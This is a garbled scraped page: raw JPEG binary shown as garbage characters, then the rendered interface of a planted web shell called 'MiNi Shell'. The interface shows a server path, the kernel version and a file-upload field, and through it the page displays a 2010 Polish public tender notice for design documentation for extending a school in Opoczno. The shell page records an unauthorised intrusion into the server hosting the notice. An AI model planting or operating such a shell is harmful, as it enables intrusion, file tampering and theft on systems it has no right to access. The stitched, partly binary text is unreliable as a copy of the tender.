JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100427/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100427/117696-N-2010.html

<p class="kh_header"><b>Opoczno: Dokumentacja Projektowo - kosztorysowa dla zadania inwestycyjnego 
pn. Rozbudowa i nadbudowa budynku Zespołu Szkół Ponadgimnazjalnych Nr 1 w Opocznie</b><br>
<b>Numer ogłoszenia: 117696 - 2010; data zamieszczenia: 27.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Opoczyński reprezentowany przez Zarząd Powiatu Opoczno , ul. Kwiatowa 1a, 26-300 Opoczno, woj. łódzkie, tel. 044 7361500, faks 044 7361500.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.opocznopowiat.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dokumentacja Projektowo - kosztorysowa dla zadania inwestycyjnego 
pn. Rozbudowa i nadbudowa budynku Zespołu Szkół Ponadgimnazjalnych Nr 1 w Opocznie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opracowanie   dokumentacji projektowo - kosztorysowej  dla  planowanej  inwestycji  rozbudowy  i  nadbudowy  budynku  szkolnego  Zespołu Szkół Ponadgimnazjalnych  w  Opocznie ul. Kossaka 1a.
Inwestor  posiada  prawo  do  dysponowania  terenem  na  cele  budowlane  oraz  prawomocną  decyzję  o  ustaleniu  lokalizacji  inwestycji  celu  publicznego  dla  planowanego  zamierzenia  inwestycyjnego
2.  Zakres  rzeczowy  opracowania  dokumentacji:
2.1.  Dokumentacja  geotechniczna  gruntu,
2.2.  Opracowanie  mapy  do  celów  projektowych,
2.3.  Inwentaryzacja  części  budynku  szkolnego  wraz  z  ekspertyzą  techniczną  pod  kątem  
możliwości  jego  nadbudowy,
2.4.  Projekt koncepcji rozbudowy i nadbudowy budynku.
2.5. Projekty budowlane i wykonawcze   z   przedmiarami   robót   oraz   specyfikacjami  technicznymi  wykonania  i  odbioru  robót  oraz  kosztorysami  (inwestorskimi  i  nakładczymi) wszystkich branż,
Projekt  zagospodarowania  terenu  działki  wraz  z  zagospodarowaniem  terenów  zieleni
Projekt  budowlany i wykonawczy  rozbudowy  i  nadbudowy  budynku  szkolnego.
Projekt  budowlany i wykonawczy  instalacji wewnętrznych.  
Projekt  budowlany i wykonawczy  przebudowy  sieci  infrastruktury  technicznej.
Projekt  budowlany i wykonawczy  dróg  wewnętrznych komunikacyjnych  wraz  miejscami  postojowymi  oraz  chodnikami  dla  pieszych.
Projekt  budowlany i wykonawczy  oświetlenia  terenu.
Projekt  budowlany i wykonawczy  elementów  rekreacyjnych  (ciągi  piesze,  patio,  elementy  małej  architektury).
2.6. Projekty  budowlane i  wykonawcze  wszystkich  branż  z  przedmiarami  robót  powinny  być  wykonane  w  5  egz.,  kosztorys  inwestorski  w  1 egz.,  kosztorys  nakładczy  oraz   specyfikacje  techniczne  wykonania  i  odbioru  robót  w  3  egz.  ponad to  całość  dokumentacji  projektowo -  kosztorysowej  musi  być  również  zapisana  na  nośniku  elektronicznym  w  formacie  PDF.



3.  Charakterystyka  planowanego  zamierzenia  inwestycyjnego.
3.1. Rozbudowa  i  nadbudowa  istniejącego  budynku  szkolnego  w  celu  uzyskania  niezbędnej  powierzchni  użytkowej  do jego  prawidłowego  funkcjonowania  zarówno  w  sferze  dydaktycznej  jak  i  sportowej.  Budynek  dydaktyczny  w  części  rozbudowy  - 3 - kondygnacyjny,  całkowicie  podpiwniczony,  przylegający  do  istniejącej  części  budynku  szkolnego  od  jego  północnej  strony  będzie  stanowił  jeden  z  boków  czworoboku  jaki  osiągnie  bryła  budynku  po  zakończeniu  planowanej  inwestycji. Sala gimnastyczna wraz  z  zapleczem  socjalnym  oraz  galerią  dla  widowni,  stanowiąca  również  element  planowanej  rozbudowy  jako  jej  zachodnie  skrzydło.  Planowana  nadbudowa  nad  częścią  zaplecza  socjalnego  istniejącej  sali  gimnastycznej  w  poziomie  II  piętra  stawić  będzie  łącznik  komunikacyjny  pomiędzy  częścią  rozbudowy  a  istniejącą  częścią  budynku  szkolnego.  Po  zrealizowaniu  całości  zamierzenia  inwestycyjnego  bryła  budynku  szkoły  osiągnie  kształt  czworoboku  z  wewnętrznym  dziedzińcem  służącym  do  celów  rekreacyjnych  dla  uczniów  w  trakcie  przerw  lekcyjnych jak również do zgromadzeń  w  czasie  uroczystości  okolicznościowych.   
Budynek  szkoły  jak i jego  otoczenie  zostanie  pozbawione  barier  architektonicznych  dla  osób  niepełnosprawnych.    
3.2. Konstrukcja ścian budynku   w  zakresie  planowanej  rozbudowy  jak  i  nadbudowy  -  mieszana;  konstrukcja  żelbetowa  monolityczna  oraz  murowana.  Ściany  zewnętrzne  -  dwu-warstwowe  z  dociepleniem  od  zewnątrz, posadowienie  budynku  na  ławach  i  stopach  żelbetowych  monolitycznych, elementy  konstrukcji  budynku  (słupy  podciągi  i  nadproża)  -  monolityczne  żelbetowe,  stropy  międzykondygnacyjne;    o  konstrukcji  żelbetowej -  płyty  kanałowe,  przykrycie  budynku  -  stropodach  o  konstrukcji  żelbetowej  z  warstwą  docieplenia,  pokrycie  -  papa  termozgrzewalna.  Wykończenie  budynku  -  standartowe.
3.3.	Wymagania  w  zakresie  funkcji  budynku :  
Rozbudowa  budynku  dydaktycznego  (skrzydło  północne):
a)   piwnica  -  kuchnia,  stołówka,  szatnie,  korytarz  komunikacyjny,
b)   parter   -  dwie  sale  dydaktyczne  z  zapleczem  (wspólnym  lub  osobnym  dla  każdej),
sala  widowiskowa  na  200 miejsc  z  zapleczem  i  sceną  (obniżona  podłoga),  węzeł  sanitarny,  korytarz  komunikacyjny  umożliwiający  przejście  do  sali  gimnastycznej,
c)	I piętro  -  trzy  pracownie  dydaktyczne  z  zapleczami  (dwie  pracownie  chemiczne  +  pracownia  biologiczna),  węzeł  sanitarny,  korytarz  komunikacyjny  umożliwiający przejście  na  galerię -  widokową  sali  gimnastycznej,
d)	 II  piętro - trzy  pracownie  dydaktyczne  z  zapleczem (pracownia fizyczna + dwie pracownie  ogólne)  węzeł  sanitarny,  korytarz  komunikacyjny.
Sala  gimnastyczna  stanowiąca  element  rozbudowy  budynku  (skrzydło  zachodnie): 
a)   parter  -  pełnowymiarowe  boisko  (20 x 40 m)  wraz  z  korytarzami  bezpieczeństwa (boisko do  piłki  ręcznej,  koszykowej  i  siatkowej),  szatnie  (damska  i  męska)  wraz  z węzłami sanitarnymi, pomieszczenia magazynowe na sprzęt sportowy, pokój nauczycielski. 
b)	I piętro  -  galeria  dla  widowni  zawodów  sportowych,  korytarz  komunikacyjny.
Łącznik  w  poziomie  I  piętra  (nadbudowa  nad zapleczem  socjalnym  istniejącej  sali  gimnastycznej) jako  korytarz  komunikacyjny  między  istniejącą  częścią  dydaktyczną  szkoły  a  planowaną  jej  częścią  rozbudowy.  
Winda  oraz  podjazd  dla  osób  niepełnosprawnych  poruszających  się  na  wózku  inwalidzkim.
Dziedziniec  wewnętrzny  patio  -  miejsce  rekreacji  młodzieży  podczas  przerw  śródlekcyjnych  oraz  zgromadzeń  okolicznościowych.    


4.  Zamawiający zobowiązuje wykonawcę do zapoznania się z terenem planowanej inwestycji
 oraz uzyskania wszelkich niezbędnych informacji, które mogą być konieczne do przygotowania oferty oraz zawarcia umowy.
5. Podwykonawstwo - Zamawiający dopuszcza wykonanie przedmiotu zamówienia przy udziale Podwykonawców..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.20.00.00-0, 71.22.10.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Doświadczenie zawodowe
Wykonawca musi wykazać, że zrealizował (rozpoczął i zakończył) w okresie ostatnich 3 lat przed wszczęciem postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, co najmniej 2 zadania odpowiadające swoim rodzajem i wartością przedmiotowi niniejszego postępowania doświadczenie zawodowe.
Za zamówienie odpowiadające swoim rodzajem i wartością usługą stanowiącym przedmiot zamówienia uznaje się opracowanie pełnej dokumentacji budowlano - wykonawczej budynku użyteczności publicznej o powierzchni użytkowej ok. 1500 m2 . Za budynek użyteczności publicznej Zamawiający uznaje obiekt opisany w § 3 pkt.6 Rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie /Dz. U. z 2003 r. Nr 75, poz. 690 z póź. zm.
Doświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że łącznie spełniają ww warunek 
Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że łącznie spełniają ww warunek 
Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu o udzielenie zamówienia publicznego zostanie dokonana zgodnie z formułą spełnia  nie spełnia wymagany warunek w oparciu 
o informacje zawarte w wymaganych dokumentach i oświadczeniach, o których mowa w rozdziale VI specyfikacji.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potencjał kadrowy 
Wykonawca musi dysponować w okresie przewidzianym na realizację zamówienia osobami zdolnymi do wykonania zamówienia, posiadającymi kwalifikacje zawodowe, a w szczególności osobami posiadającymi uprawnienia w rozumieniu ustawy Prawo Budowlane z dnia 07.07.1994 r. tekst jednolity: Dz. U. z 2006 r., Nr 156, poz. 1118 z póź. zm. oraz ustawy z dnia 15.12.2000 r. o samorządach architektów, inżynierów budownictwa oraz urbanistów Dz. U. z 2001 r., Nr 5, poz. 42 z póź. zm. do projektowania bez ograniczeń w specjalnościach:
a) architektonicznej,
b) konstrukcyjno - budowlanej,
c) instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, gazowych, wentylacyjnych, wodociągowych i kanalizacyjnych,
d) instalacji w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,
e) drogowej,
oraz aktualne zaświadczenie  właściwej Okręgowej Izby Inżynierów Budownictwa, ważne na dzień składania ofert.
Potencjał kadrowy Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że łącznie spełniają ww warunek 
Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu o udzielenie zamówienia publicznego zostanie dokonana zgodnie z formułą spełnia  nie spełnia wymagany warunek w oparciu 
o informacje zawarte w wymaganych dokumentach i oświadczeniach, o których mowa w rozdziale VI specyfikacji.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.opocznopowiat.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Opocznie ul. Kwiatowa 1a
26 - 300 Opoczno.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.05.2010 godzina 12:30, miejsce: Starostwo Powiatowe w Opocznie ul. Kwiatowa 1a
26 - 300 Opoczno - biuro podawcze lub za pośrednictwem poczty.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com